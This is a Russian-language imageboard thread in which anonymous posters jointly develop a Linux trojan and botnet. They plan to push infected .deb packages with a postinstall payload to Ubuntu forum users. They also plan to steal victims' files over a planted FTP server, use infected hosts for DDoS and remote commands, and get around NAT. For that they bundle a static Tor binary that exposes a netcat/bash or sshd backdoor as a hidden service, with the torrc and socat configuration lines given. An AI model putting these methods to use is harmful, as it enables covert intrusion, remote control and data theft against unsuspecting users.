Аноним Срд 24 Июл 2013 02:28:50  #262 №46399 

>>46398
>абузу накатали
Полтора года не катали, а сейчас накатали? Ну, хуй знает.

Аноним Чтв 25 Июл 2013 16:18:43  #263 №46420 
1374754723543.jpg

Многие сидят за NATом, у некоторых динамические айпи.Наверное, стоит хранить отдельно открытые ключи нод в разных списках и пары айпи:порт, при подключении забирать еще и другие пары айпи:порт.
Списков таких "ретрансляторов" достаточно думаю два - сам список и чёрный список.

Аноним Чтв 25 Июл 2013 17:51:26  #264 №46421 

>>46420
>стоит хранить отдельно открытые ключи нод в разных списках и пары айпи:порт, при подключении забирать еще и другие пары айпи:порт
Не распарсил.

Аноним Чтв 25 Июл 2013 20:23:13  #265 №46422 

>>46421
Подключаться боты будут по адресам айпи:порт, которые не привязаны к собственно ботам.
После подключения боты обмениваются открытыми ключами и подтверждениями открытых ключей, не забывая подписывать сообщения.

В той версии, что я выкладывал, адрес ноды имел вид айпи:порт@открытыйКлюч, но такая жесткая привязка не нужна в эпоху NAT и динамических айпи.

Аноним Чтв 25 Июл 2013 20:58:36  #266 №46423 

>>46422
А, ну норм. Я не хотел так делать, потому что не получится обойтись парой сообщений запрос-ответ, нужно будет как минимум три сообщения, а то и четыре.

!cFuDhkRhvE Птн 26 Июл 2013 20:51:28  #267 №46430 
1374857488132.jpg

Абу - Нариман

!cFuDhkRhvE Суб 27 Июл 2013 22:35:44  #268 №46452 
1374950144885.jpg

В связи со сложившейся ситуацией, я съёбываю.Осенью попытаюсь запилить то, что мы тут вместе понапридумывали, получится - вернусь с новой версией.Всем добра.

Аноним Суб 27 Июл 2013 22:52:24  #269 №46453 

>>46452
Пока НПространство кун, не забрасывай это дело, идея очень годная!

Аноним Чтв 08 Авг 2013 21:05:45  #270 №46767 

Тактический.

sageАноним Срд 21 Авг 2013 06:13:45  #271 №47318 

ой

Аноним Чтв 31 Окт 2013 15:10:04  #272 №48434 

Зима близко.

Аноним Пнд 04 Ноя 2013 13:03:37  #273 №48507 
1383555817919.png

Такое дело, осень на дворе и все дела.
Оп я тут арч собрал, если понадобится буду подопытной макакой.
Пора пилить трояны для линупсов!

Аноним Пнд 04 Ноя 2013 18:35:35  #274 №48511 

>>48507
Поддержу, есть на чем тестить.

мимо-кофейник

Аноним Пнд 04 Ноя 2013 20:25:13  #275 №48514 
1383582313522.jpg

>>48507
>>48511
Пытаться продолжить делать децентрализованую версию? Я в ней сейчас плохо разбираюсь, так как давно ею не занимался. Опять же, делать сервер на bash+nc - то ещё мозгоёбство.

Аноним Пнд 04 Ноя 2013 20:29:16  #276 №48515 

>>48514
Сам решай. В разработке линукс-трояна главное процесс, а не результат, ящитаю.

Аноним Втр 05 Ноя 2013 16:41:17  #277 №48536 

>>48515
Ну это с любым линуксовым софтом такая беда.

Аноним Втр 05 Ноя 2013 17:52:36  #278 №48537 

>>48536
Какой-то толстый вброс.

Аноним Втр 05 Ноя 2013 19:53:50  #279 №48543 

Представляете сколько хомяков можно будет срубить елси заразить сервер с пакетами какого-нибудь там дистрибутива?
Это же охуенно!
Правда это сразу заметят и выпилят.
Остаётся только способ вброса через свою репку, или как нибудь еще.

Аноним Срд 06 Ноя 2013 00:34:56  #280 №48553 

>>48543
Пакеты подписаны например. Тебе понадобится ещё где-то спиздить приватный ключ.

Аноним Чтв 01 Май 2014 17:56:01  #281 №51006 
1398952561510.jpg
Аноним Чтв 01 Май 2014 22:03:06  #282 №51008 
1398967386232.png

>>51006
Что это?

Нспейс кун выходи на связь, пора пилить трояны программы для удалённого управления.
Арч кун на связи, буду подопытной крысой во благо науки.

Аноним Суб 03 Май 2014 16:44:22  #283 №51014 

>>51008
Ты имеешь в виду новую версию куколки, или вспомагательные скрипты на неё?

Аноним Суб 03 Май 2014 17:37:25  #284 №51015 
1399124245084.jpg

>>51008
Алсо, что пока на уме:
- добавить цифровую подпись на задание, чтоб ушлые при получении доступа к серверу не начинали командовать парадом
- набор: статический бинарник фтп-сервера для поиска цп, ну и как-то попробывать реализовать доступ к монитору. На след. неделе посмотрю на эту тему иксы поддерживают это искаропки, но хз, может нужно править конфиги.
Версия централизованная.
Оп.

Аноним Суб 03 Май 2014 19:00:52  #285 №51016 

>>51015
Опушка ты живой, какая новость хорошая.

Аноним Вск 04 Май 2014 03:28:17  #286 №51019 

>>51015
>доступ к монитору
Только в качестве опции, а не требования. А то вдруг на сервер кто-нибудь захочет поставить.
VNC лучше запускай, если всё равно будешь бинарники с собой таскать.

Аноним Вск 04 Май 2014 15:59:17  #287 №51020 

>>44025
ТЫ ЧО СУКА ПДАЛА ТЫ ЧО СДЕЛАЛ
Не трожь мою убунту, пидор!

Аноним Вск 04 Май 2014 20:28:10  #288 №51021 

>>51020
Твоя бубунта скатилось в говно уже очень давно.
Не понимаю как люди продолжают пользоваться этим говном.

Аноним Пнд 05 Май 2014 10:30:57  #289 №51024 
1399271457202.jpg

Арчер, какая у тебя разрядность системы?

Аноним Пнд 05 Май 2014 14:03:21  #290 №51025 
1399284201868.png

>>51024

Аноним Пнд 05 Май 2014 15:42:46  #291 №51027 

>>51025
https://github.com/cheng-shiwen/ftp
Сначала попробуй так запустить бинарники, если не получится - пересобери, желательно статиком gcc -static -o ftp_server ftp_server.c
./ftp_server 21 от рута
Дальше - в браузере коннектишся к ftp://127.0.0.1, получается - ок, пытаешся скачать файл, пишешь результат.
У меня скачивается только wget'ом, т. к. все браузеры работают криво.

Аноним Пнд 05 Май 2014 16:21:06  #292 №51028 
1399292466324.png

>>51027
Да, и загрузить файл на сервер не получается вообще никак. Разве что встроенной функцией самой куклы с командного сервера.

Аноним Пнд 05 Май 2014 17:26:25  #293 №51030 

>>51027
>>51028
Всё работает, я использовал бинарник клиента. Через браузер глючит.
Видимо сам сервер заточен под клиент, а браузер шлёт ему охуенные команды от которых сервер охуевает, как-то так.
Вот собственно скачивание и загрузка.
И да, сервер работает только от рута.
http://ge.tt/8iSBxuf1/v/0

Аноним Пнд 05 Май 2014 19:53:54  #294 №51031 
1399305234322.jpg

>>51030
Ядра всяких бубунт для x86-64 тоже собираются совместимыми с 32-битными приложениями? А сервак должен запускаться от пользователя на порту больше 1024, у меня так.
Хотел запостить фотку сделанную сегодня с бтром на проспекте, но вакаба кусается из-за большого разрешения.

Аноним Пнд 05 Май 2014 20:07:19  #295 №51032 

>>51031
закидывай фоточку бтра на imgur, интересно-же.
Почему порт > 1024?

Аноним Пнд 05 Май 2014 20:38:29  #296 №51033 

>>51032
Насколько я знаю, пользователи могут открывать порты >1024, ибо все предыдущие порты резервируются для системных служб. Тот же тор и айтупи работают от пользователя, айтупи ещё и веб-интерфейс на локалхосте открывает.
rghost.ru/54970387

Аноним Пнд 05 Май 2014 20:42:09  #297 №51034 

>>51033
Иногда бтры и сами едут, неделю назад два истребителеподобные самолёта пролетали.
Так есть смысл поставлять 64-битную сборку фтп-сервера, или забить хуй?

Аноним Пнд 05 Май 2014 21:17:00  #298 №51035 
1399310220912.gif

>>51033
Хороший такой бтр.
Я только сейчас понял что ты имел ввиду, ты говорил про запуск от пользователя.
Да у меня тоже от пользователя работает на порты > 1024.
Дело в том что с очень большой вероятностью левые порты будут выпиливаться NATами или всякими там рутерами.
Надо подумать как это обойти.
А зачем ты 64-битную версию с собой брать хочешь?
Думаешь 32-х битка на х86_64 системе не взлетит?
Если что, можно где-нибудь, в надёжном месте, держать обе версии, и после определения архитектуры скачивать нужную.

Аноним Пнд 05 Май 2014 21:46:48  #299 №51036 
1399312008672.jpg

>>51035
>в надёжной месте
Бинарники многовато весят, так что они изначально будут храниться на КС, и загружаться если понадобятся. Так что собери статиком и залей на файлообменник смерти, кину в рабочую папку.

NAT оче мешает. Можно разве что постоянно посылать пакеты с нужного порта во внешнюю сеть, тогда можно будет приконнектиться на этот же порт. Но не ясно - если можно с любого айпи подключаться, то норм, а если нет, то нужно явно слать на свой айпи - больше мороки в таком случае. Погугли на этот счёт.

Если нат так не обойти, можно набыдлокодить скрипт или прогу на крестах, которая сама подключается куда надо, и даёт управление - но опять нужен точный айпи.

Аноним Пнд 05 Май 2014 22:12:37  #300 №51037 
1399313557694.jpg

>>51036
Вот бинарники, скомпилял статиком.
http://ge.tt/93ITBwf1/v/0

Про нат, я тут думал какой-нибудь туннель склепать.

Давным-давно прошлым летом я радминил хомяков тёмной кометой, чтобы обойти нат и всё такое, я использовал no-ip.
То есть в сервере кометы писал не айпи адрес а dns, например super_hakir.no-ip.biz. А у себя я включал софтину от no-ip. Он перенаправлял все подключения дарк комета на меня.
Дело в том что если перенаправлять коннект на себя, тебя очень легко спалить, ведь если пингануть хост no-ip, он выдаст твой настоящий ip.

А что если сделать граббер ип на пехапе? Хомяк будет коннектится на него, и оставлять свой айпи и другие данные через user_agent как в snowtraces.
Так мы получим список ип живых хомяков и потом уже можно коннектится к ним напрямую по ип.

Аноним Втр 06 Май 2014 08:11:08  #301 №51042 
1399349468217.jpg

>>51037
>коннектится к ним напрямую по ип
Если нат хранит local_ip:local_port - external_ip:external:port, то наверное фтп-сервер нужно запускать на хомяке на том же порту, на котором находится коммандный сервер, я так понимаю?

!IBY95raeH6 Втр 06 Май 2014 09:03:54  #302 №51043 

123

Кобато-чан !IBY95raeH6 Втр 06 Май 2014 09:04:59  #303 №51044 

2

Кобато-чан !SNcko8LrxE Втр 06 Май 2014 09:22:28  #304 №51045 

123

Кобато-чан !kobatoFauk Втр 06 Май 2014 09:24:00  #305 №51046 

3214

Аноним Втр 06 Май 2014 09:37:44  #306 №51047 
1399354664656.jpg

>>51044
>>51045
>>51046
Ты кто?

Кобато-чан !xTkobato/I Втр 06 Май 2014 09:57:25  #307 №51048 

>>51047
Да никто.

Кобато-чан !NNKGFPN5fQ Втр 06 Май 2014 09:58:46  #308 №51049 

Аллах

Аноним Втр 06 Май 2014 13:14:15  #309 №51051 
1399367655563.jpg

>>51042
Ну я вообщем-то и не совсем понял зачем тебе нужен фтп сервер.
Чтобы грабить корованы хомяков?
Допустим хомяк установил заражённый пакет, соответственно куколка запускается тоже от рута inb4 rm -rf / и значит если мы будем запускать фтп сервер от куклы он тоже будет работать от рута. Что мешает повесить его на порт 21? Если не ошибаюсь системные порты натом не режутся.

>Если нат хранит local_ip:local_port - external_ip:external:port, то наверное фтп-сервер нужно запускать на хомяке на том же порту, на котором находится коммандный сервер, я так понимаю?

Щито? Я не понимат.

Аноним Втр 06 Май 2014 14:11:33  #310 №51052 
1399371093155.jpg

>>51049
Аллах-бабах ты еще не взорвался?

Аноним Втр 06 Май 2014 14:49:18  #311 №51053 
1399373358117.png

>>51051
>Чтобы грабить корованы хомяков
Именно. Просто сейчас я думаю добавить модулей для куклы, в основном скрипте я только попробую сделать цифровую подпись задания.

>Если не ошибаюсь системные порты натом не режутся
Насколько я знаю, по умолчанию режется всё. Пикрилейтед - вполне системный порт, еще и 21, обычный быдлороутер.

То, что ты не понял - это таблица маршрутизации. Во внутренней сети другие айпи. Для безопасности при прохождении пакетов внутренний айпи меняется на внешний, и меняется порт.
В таблицу добавляются соосветствия - пары внутренних айпи-порт и внешних для разных соединений, и эти таблицы иногда чистятся.

Т. е. комп хомяка должен пытаться подключиться на тот же порт, куда на него самого будут подключаться, чтоб в таблице маршрутизации было такое соответствие.

Аноним Втр 06 Май 2014 14:56:52  #312 №51054 
1399373812802.png

>>51053
И даже если быть подключённым к 21 порту кого-нибудь, мой порт всё равно закрыт. Короче с NAT мы пока что соснули.
>>51051
А реализацией чего ты предлагаешь заняться? Я надеюсь ты ведь читал README седьмой версии?

Аноним Втр 06 Май 2014 15:09:33  #313 №51055 

>>51054
>Я надеюсь ты ведь читал README седьмой версии?
Седьмой версии чего?

Про нат надо подумать. Я тут потестю немножко ближе к вечеру, ок?

Может что придумаю.

Аноним Втр 06 Май 2014 15:53:53  #314 №51056 
1399377233381.png

>>51055
>седьмой версии чего
Куклы, очевидно же.
>потестирую
Ок

Аноним Втр 06 Май 2014 16:56:17  #315 №51057 

>>51056
А где можно скачать 7ю версию?

Аноним Втр 06 Май 2014 17:17:41  #316 №51058 

>>51051
>системные порты натом не режутся
Наркоман штоле сука?
Кстати, ОПушка, почему ты так не хочешь тор? Он же божественный: для управления, где не нужны гигабитные скорости, подходит великолепно, и никакой ёбли с натами.

Аноним Втр 06 Май 2014 17:36:22  #317 №51059 
1399383382678.gif

>>51058
Я не наркомант.
Оче плюсую тор. Ведь он даёт бонус к скрытности.
Алсо грабить хомяков можно через посредника, например заставлять их отсылать файлы на какой-нибудь сервер и потом уже оттуда их забирать предварительно обмазавшись тором.

Аноним Втр 06 Май 2014 19:02:48  #318 №51060 
1399388568554.jpg

>>51057 => >>45614 раржпег
Ты тред читал?
>>51059
>тор
Тяжел же. Если основной функционал - ддос и дестрой системы кстати как насчёт спама?, то он не нужен. Всё работает и на бесплатных хостингах. К которым нужно подключаться через тор с целью сохранения анальной девственности ирл, да.

Аноним Втр 06 Май 2014 19:14:47  #319 №51061 
1399389287480.jpg

>>51058
Ебля с натами нужна только для всяких плюшек вроде подглядывания/пиздинга файлов. Основной функционал ботнета см. выше.

Аноним Втр 06 Май 2014 20:01:12  #320 №51062 
1399392072084.png

>>51060
Спасибо скачал, сейчас почитаю.
Если так, то да тор не нужон.
А что ты только для ддосса использовать хомяков собрался?
Как на счёт произвольных команд?
Что-то на подобие obey сноуболла?
То есть, клепаешь скрипт, загружаешь его на КС, потом хомяки его качают и запускают.

Аноним Втр 06 Май 2014 20:14:15  #321 №51063 
1399392855352.jpg

>>51062
Такой функционал уже реализован. Есть встроенные команды, а можно запускать скрипты или исполняемые файлы.

Аноним Втр 06 Май 2014 20:17:19  #322 №51064 

>>51063
Это хорошо.

Аноним Втр 06 Май 2014 21:05:21  #323 №51065 

>genTrash() { date '+%s'|base64|base64|gzip -f }
/dev/urandom не в моде штоле?

Аноним Втр 06 Май 2014 21:35:20  #324 №51066 

>>51065
Если через dd, то нужно лишний раз сохранять. А данных всё равно нужно очень мало. Просто костыль, забей.

Аноним Втр 06 Май 2014 22:10:31  #325 №51067 

>>51066
Не обязательно.
dd if=/dev/urandom count=1 bs=32 | base64
head -c 32 /dev/urandom | base64
>Просто костыль
Просто советую же.

Аноним Срд 07 Май 2014 10:45:47  #326 №51070 
1399445147346.jpg

>>51067
Ну исправлю, если так можно.
Что там с анатом?

Аноним Срд 07 Май 2014 10:49:23  #327 №51071 
1399445363450.jpg

NATом*

Аноним Срд 07 Май 2014 14:00:10  #328 №51074 

>>51071
У меня вчера не было время, теперь уже сегодня попробую.
Кстати no-ip тоже не решение, там тоже порты пробрасывать надо.

Аноним Срд 07 Май 2014 16:13:23  #329 №51076 
1399464803814.jpg

>>51074
Боже кажется фтп сервер работает только в локалке.
Через внешние интернеты он не хочет работать, я пробовал изменять ип адрес в исходниках, он не запускается.

Я тут подумал, у хомяка сто пудов есть открытые порты, для того что-бы найти их, нам нужен ип хомяка:

curl http://whatismyip.akamai.com/


Берём его и заставляем хомяка сканить самого себя:
nmap <hamster_ip>


Теперь запускаем нужную софтину на этот порт.

Только тут придётся нмап с собой таскать.

А фтп хз почему из внешних интернетов не работает. Может другую найти?
Аноним Срд 07 Май 2014 17:55:10  #330 №51077 
1399470910299.jpg

>>51076
>сто пудов есть открытые айпи
Да в том-то и дело, что они есть, но роутеры с NATом по умолчанию блокируют все входящие соединения, на какой бы порт не стучаться.
Думаешь, у многих хомяков стоит фтп/веб/почтовый сервер? Нат и такие порты блокирует, иначе для малварщиков выход использовать системные порты является очевидным.
>может другой фтп найти
Да я и к своему локальному веб-серваку не смог подключиться.

Аноним Срд 07 Май 2014 20:57:31  #331 №51078 

>>51070
А что с натом? Ты так сказал, как будто на него похуй:
>Ебля с натами нужна только для всяких плюшек
Я уже предложил — таскай с собой тор, чтобы поднимал hidden service. Всё равно без внешнего сервера (своего или чужого) ты никак нат не обойдёшь. Ну разве что http://samy.pl/pwnat/, если совсем любитель попердолиться.
Для части «домашних» хомяков, у которых белый IP и роутер, подойдёт проброс портов через upnp, как делают всякие скайпы. Гугли. Без утилиты тоже не обойтись, посмотри на примере upnp-router-control.

Аноним Срд 07 Май 2014 21:21:32  #332 №51079 
1399483292590.jpg

>>51078
На утилиту завтра гляну.
Так как ты предланаешь улучшить/изменить куклу? Или будем начинать куда-нибудь выбрасывать инфицированные deb?

Аноним Срд 07 Май 2014 22:45:57  #333 №51080 

>>51079
имхо вбрасывать инфецированные дебки рановато, надо потестить еще, снатом разобратся.

sageАноним Срд 07 Май 2014 23:09:58  #334 №51081 
1399489798572.jpg

>>51080>>51079
> вбрасывать инфецированные дебки
Распространение вирусов уровня /i/

Аноним Срд 07 Май 2014 23:43:25  #335 №51082 

>>51081
А как ты хотел?

sageАноним Чтв 08 Май 2014 00:17:43  #336 №51083 

>>51082
Если хотя бы 10 лохов скачают и запустят ваши .deb трояны, то это уже будет успехом мирового масштаба. Да и если грузить через фреймы и сплоеты под десктоп, то пробив будет примерно такой же на сотню тысяч пользователей. Просто смешно читать.

Аноним Чтв 08 Май 2014 05:10:55  #337 №51084 

>>51079
>как ты предланаешь улучшить
Кратко: реализовать управление через тор, что позволит вообще не думать о NAT'ах.
Подробно:
1) Скрипт опционально загружает бинарник tor. Нужно собрать в статике или поставлять вместе с библиотеками и LD_PRELOAD/LD_LIBRARY_PATH. Он в бандле так и идёт, кажется.
2) После этого должен писаться конфиг на создание скрытого сервиса и запускаться тор с этим конфигом (tor -f /path/to/torrc).
3) На скрытом сервисе повесить sshd (если есть) или какой-нибудь netcat с башем. Да хоть telnet, лол.
4) Отстучать адрес HiddenService, чтобы ты знал, куда подключаться. Можно стучать на хостинг, как сейчас, или тоже на HiddenService.
Это совсем не сложно. Скрытый сервис делается в две строки в конфиге:
>HiddenServiceDir /var/lib/tor/hidden_service/
>HiddenServicePort 80 127.0.0.1:80
В директорию из первой строки при запуске будет записан hostname и приватный ключ. Во второй строке написано, на какой порте .onion-псевдоадреса будет проброшен локальный порт.
Подключаться ssh к onion-адресам можно, установив socat и записав в свой (локальный) ~/.ssh/config такую строку:
>ProxyCommand socat STDIO SOCKS4A:localhost:%h:%p,socksport=9050
У моей тянки такой бекдор на ноутбуке стоит, весьма удобно. Нихуя себе настрочил.
>>51083
Кажется, мсье слегка переоценивает современных пользователей ЖМУ/Пинуса, обитающих на всяких убунтуфорумах и Майлру.Ответах. Я бы даже попробовал, если бы не было более интересных дел.

Кобато-чан !kobatoW4cY Чтв 08 Май 2014 05:48:22  #338 №51085 

12345

Аноним Чтв 08 Май 2014 08:14:40  #339 №51086 
1399522480126.jpg

>>51085
опять начинаешь, ебучий шакал

Аноним Чтв 08 Май 2014 08:17:22  #340 №51087 

>>51084
А зачем таскать с собой 20 метров бандла, если можно установить обычный тор без браузера, который весит всего метров 5? Или там какие-то хитрости? Я не понимаю.
Да, тор всё-таки годная штука, мне нравится твоя идея.

Аноним Чтв 08 Май 2014 09:40:26  #341 №51088 

>>51087
>зачем таскать с собой 20 метров бандла
Незачем, я и не предлагал. Просто написал, что нужен либо бинарник со -static, либо библиотеки, как в бандле. Там 5 Mb чистыми.

Аноним Чтв 08 Май 2014 12:13:53  #342 №51089 

Хм. Ну если командный сервер обычный, а дополнительный для фтп и всяких плюшек в скрытосети, то можно такое запилить.
Сегодня попробую собрать статикой тор, а ты, Арчер, тоже попробуй.
ОП

Аноним Чтв 08 Май 2014 15:14:39  #343 №51092 

>>51089
Только сам бинарник тора, да?
Просто через gcc -static source.c?
Сейчас скачаю тор, посмотрю что там и как.

Аноним Чтв 08 Май 2014 15:32:33  #344 №51093 

>>51092
>Только сам бинарник тора, да?
Да.
>Просто через gcc -static source.c?
Точно нет. Как и обычная сборка софта из исходников, всякие ./configure && make. Не уверен, что получится, у меня со статической линковкой libcurl какие-то проблемы были.
Проще будет взять из бандла готовую папочку «Tor» и посмотреть в скрипте, какие LD_-переменные куда писать.

Аноним Чтв 08 Май 2014 16:19:42  #345 №51094 

>>51093
Если что у меня тор уже стоит, не из бандла. Могу бинарник готовый отдать.

Аноним Чтв 08 Май 2014 17:13:03  #346 №51095 
1399554783000.jpg

>>51094
Не знаю как на бубунте но у меня на арчике например тор работает как сервис через systemctl, алсо часто пользуюсь torify, враппер для тора, просто годнота.
Сам бинарник тора весит 1.8 метров.
Настройки прописаны в /etc/tor/torrc.
Если пользоватся тором только для обмазки консольных приложений, торбандл совсем не нужен.

Аноним Чтв 08 Май 2014 17:14:35  #347 №51096 

>>51095
Алсо где исходники тора найти? Гугл находит только этот ебучий бандл.

Аноним Чтв 08 Май 2014 17:21:22  #348 №51097 
1399555282474.png

>>51096
Кстати, я тут в бандле покопался.
Там весь тор стандалон лежит. И бинарник тора есть и torrc, даже библиотеки, даже аллах.

Оптимальное решение - распотрошить бандлы х86 и х86_64, собрать обрезанный стандалон тор и запускать его. Ко всему этому можно прикрутить torify, тогда лепота вообще будет.

Аноним Чтв 08 Май 2014 17:45:10  #349 №51098 
1399556710848.jpg

>>51097
Ну тогда так и сделаем.
Кстати, я на четыре дня уёбываю.
А этот бинарник как ссылается на библиотеки - абсолютными путями? То есть нужно будет копировать библиотеки в системные директории, или как?

Аноним Чтв 08 Май 2014 18:58:41  #350 №51099 
1399561121754.png

>>51098

>А этот бинарник как ссылается на библиотеки - абсолютными путями?

Копировать в системные папки не придётся, достаточно чтобы бинарник и библиотеки были в одном каталоге.
Пикрилейтед из бандла.
Алсо не надо забывать torrc и конфиги, они лежат в Data/Tor

Аноним Чтв 08 Май 2014 19:53:25  #351 №51100 
1399564405802.png

>>51098
>бинарник как ссылается на библиотеки
Чтец жопой что ли? Ну прочитай мои предыдущие посты, я устал повторять. LD_LIBRARY_PATH/LD_PRELOAD.
>>51099
>достаточно чтобы бинарник и библиотеки были в одном каталоге
Нет, не достаточно, пруфпик. Это тебе не сперма, чтобы левые dll-ки автоматом юзать.
А у тебя работает потому, что нужные библиотеки уже установлены в системе. Пруф: ldd /home/arch/Tor/Tor/tor

Аноним Чтв 08 Май 2014 19:57:55  #352 №51101 

>>51096
>где исходники чего угодно найти
Обычно здесь https://www.debian.org/distrib/packages
Например, https://packages.debian.org/wheezy/tor — справа в колонке есть «Исходный код tor». Архив с «orig» в названии.

Аноним Чтв 08 Май 2014 20:08:46  #353 №51102 
1399565326313.png

>>51100
Таки-да, я соснул хуйца.

Аноним Птн 09 Май 2014 10:22:17  #354 №51107 
1399616537900.jpg

>>51102
Можно будет скриптом по очереди проверять наличие библиотек, и копировать их если нужно.

Аноним Птн 09 Май 2014 11:34:03  #355 №51108 

>>51107
Можно конечно.

Аноним Птн 09 Май 2014 12:21:09  #356 №51110 

>>51107
>проверять наличие библиотек
А совместимость версий? Под именем «libc.so.6» может скрываться какая угодно версия libc, и тор не обязательно с ней заработает.
>копировать
В /usr/lib/? Лучше не нужно, ещё систему запорешь случайно.
Я уже даже показал, как делать, пикрелейтед >>51100. Не ленись, сходи в гугл и узнай, что это за такое LD_, о котором я тут пизжу без умолку.

Аноним Птн 09 Май 2014 12:23:07  #357 №51111 

>>51110
Это оно?
http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

Аноним Птн 09 Май 2014 13:36:07  #358 №51112 

>>51111
В принице, оно. Можно и что-нибудь попроще. http://www.firststeps.ru/linux/r.php?7

Аноним Птн 09 Май 2014 14:25:50  #359 №51113 
1399631150988.gif

>>51110
Наконец глянул на твой пик. Ну тогда это просто замечательно.
Итак, бинарь тора, библиотеки, torrc.
Torrc можно использовать без копирования в /etc?

Аноним Птн 09 Май 2014 14:30:31  #360 №51114 
1399631431691.jpg

>>51113
>tor -f /path/to/torrc
Блджад, нужно чаще перечитывать активную ветку обсуждения.
>>51084
В понедельник начну пилить эту схему.

Аноним Птн 09 Май 2014 14:46:29  #361 №51115 

>>51114
Няша.
Не прошло и года >>45895>>45898>>45909 :3

Аноним Птн 09 Май 2014 16:21:01  #362 №51116 

>>51115
Ну для ftp без этого никак.

Аноним Суб 10 Май 2014 23:01:37  #363 №51126 
1399748497713.jpg
Аноним Вск 11 Май 2014 14:39:55  #364 №51132 
1399804795193.png

бамп воимя торвальдса

Аноним Пнд 12 Май 2014 14:30:56  #365 №51143 

Есть ли смысл открывать соединения у хомячка всяких ftp и прочих на случайных портах, или забить хуй?

Аноним Пнд 12 Май 2014 15:11:41  #366 №51144 

`[email protected] ~/.ns/bin/tor $ echo $LD_LIBRARY_PATH && ./tor -f torrc
/home/tux/.ns/bin/tor
./tor: symbol lookup error: ./tor: undefined symbol: EC_KEY_new_by_curve_name`

Аноним Пнд 12 Май 2014 15:13:31  #367 №51145 

>>51144
>[email protected]
>/home/tux
Нувыпоняли.

Аноним Пнд 12 Май 2014 16:03:34  #368 №51146 

>>51144
А, выполнил дополнительно export LD_LIBRARY_PATH и заработало.

Аноним Пнд 12 Май 2014 16:15:09  #369 №51147 

>>51146
Тестовый сервер работает, подключился сам к себе через .onion в тор-браузере.

Аноним Пнд 12 Май 2014 16:37:35  #370 №51149 
1399898255324.jpg

Нашёл другой ftp-сервер и клиент, в нём уже хоть можно файлы скачивать и загружать. Арчер, пока наверное не компиль - может лучше найдём. Чтобы не проебать: https://github.com/aphu/FTP
У самого подходящего telnet-сервера, который я нашёл, недостаток - при Ctrl+C в netcat сервер завершает работу, нужно вводить команду logout. У другого порт вшит, что теоретически не Ъ. Или забить хуй на случайные порты?
пикрандом
ОП

Аноним Пнд 12 Май 2014 20:22:45  #371 №51151 

>>51149
А чем плох nc?

Аноним Пнд 12 Май 2014 20:36:57  #372 №51152 

Ньюфаг врывается в тред.
>вбрасывать инфецированные дебки
Вы же упоротые, не? В чем задумка то?

Аноним Пнд 12 Май 2014 21:21:22  #373 №51153 

>>51151
Он же написал — завершает работу при Ctrl+C.
>>51152
Нет, ты. Делаешь .deb с личинкой в postinstall, вбрасываешь лохам на убунтофоруме или Ответах.Мэйлру.

sageАноним Пнд 12 Май 2014 21:25:48  #374 №51155 

>>51153
>Делаешь .deb с личинкой в postinstall, вбрасываешь лохам на убунтофоруме или Ответах.Мэйлру.
Действительно уровень /i/

Аноним Пнд 12 Май 2014 22:06:15  #375 №51157 
1399917975705.gif

>>51151
Как сервер - я не уверен, что он есть в бубунтах. Впрочем, завтра попробую собрать статиком с поддержкой опции -е.
>>51155
А ты что предлагаешь?

Аноним Пнд 12 Май 2014 22:08:03  #376 №51158 
1399918083698.jpg

>>51111
О, квадрипл.

Аноним Пнд 12 Май 2014 22:19:44  #377 №51159 

>>51157
>А ты что предлагаешь?
А он нигилист.

Аноним Втр 13 Май 2014 15:04:52  #378 №51161 
1399979092878.jpg
Аноним Втр 13 Май 2014 19:30:45  #379 №51164 

Арчер, компиль netcat статикой: http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.bz2
Как через прокси подключаться к ftp и netcat'у? Запустить тор, и включить каким-то образом прокси на уровне системы? Графическую прогу для этого в убунте видел, а как через консоль? С помощью iptables?

Аноним Втр 13 Май 2014 19:43:37  #380 №51168 

>>51164
К неткату можно вот так, по идее:
>socat STDIO SOCKS4A:localhost:%h:%p,socksport=9050
где %h:%p это onion-домен и порт.
Для ftp нужен клиент с поддержкой socks-прокси.

Аноним Втр 13 Май 2014 21:02:49  #381 №51169 
1400000569117.jpg

WARNING! В ядре Linux обнаружена уязвимость пятилетки! Тут есть норммальные си-кодеры? Представленный эксплойт работает на небольшом количестве версий, но уязвимость есть с ветки 2.6.хз. Статьи есть на хабре и ксакепе.

Аноним Втр 13 Май 2014 22:19:16  #382 №51170 

>>51164
А через torify не прокатит?
Алсо надо манки nc почитать, может там есть настройки носков.
Качаю сорсы, сейчас буду компилять.

Аноним Втр 13 Май 2014 22:21:00  #383 №51171 

>>51169
Нету.
>1400000569117.jpg
Поздравляю всех с новым 100M-секундным интервалом. А ведь когда я пришёл на двачи, было 1230000000.

Аноним Втр 13 Май 2014 22:35:26  #384 №51172 
1400006126374.png

>>51170
Ок, как мне это скомпилировать, без установки?
Через


./configure
make

Так?

Кстати, может nc впаривать вместе с таром и уже на самом хомяке устанавливать через тот-же


./configure
make
make install


Тар ведь и метра не весит. А заморачиваться с бинарниками, библиотеками и прочими косяками имхо наркоманство...
Аноним Втр 13 Май 2014 22:42:18  #385 №51173 
1400006538570.gif

>>51172
В разных осях могут отсутствовать вспомагательные библиотеки/программы для сборки.
CC="gcc -static" ./configure
make
strip src/netcat

А с библиотеками заморочки только у тора.

Аноним Втр 13 Май 2014 22:49:18  #386 №51174 
1400006958920.jpg

>>51171
И тебя тоже с новым стомиллионником, бро.

Аноним Втр 13 Май 2014 22:56:11  #387 №51175 

>>51173
>CC="gcc -static"
Флаги уровня /s/. "-static" в CFLAGS нужно писать, если по-культурному.
>с библиотеками заморочки только у тора
>только у тора
То ли знания уровня /s/, то ли формулировка уровня /b/.

Аноним Втр 13 Май 2014 23:34:56  #388 №51176 

>>51175
>>51173
Как компилять-то?

Аноним Срд 14 Май 2014 00:31:20  #389 №51177 

>>51176
Так как он сказал >>51173 или
CFLAGS="-static" ./configure
make
strip src/netcat

Аноним Срд 14 Май 2014 17:21:57  #390 №51184 

>>51176 -> >>51149
Компиляй и новый ftp.
Рарджпег уже в пост не вместится, буду загружать на ргхост. Это из-за большого размера тора и базы geo-ip.

TODO:
+ Tor
+ FTP
+ Telnet
? Secure connect to telnet
W Admin Panel+
- Signature
Аноним Срд 14 Май 2014 17:40:10  #391 №51185 

>>51184
Ок, nc скомпилял через


CFLAGS="-static" ./configure
make
strip src/netcat


А FTP через make. Там на крестах написано, я g++ не пользовался никогда. Там тоже -static есть?

А в чем фишка -static?
И что делает strip?

http://ge.tt/4bC397h1/v/0
Аноним Срд 14 Май 2014 18:07:22  #392 №51186 

>>51185
С стрип всё понятно, выпиливает таблицу символов, так?
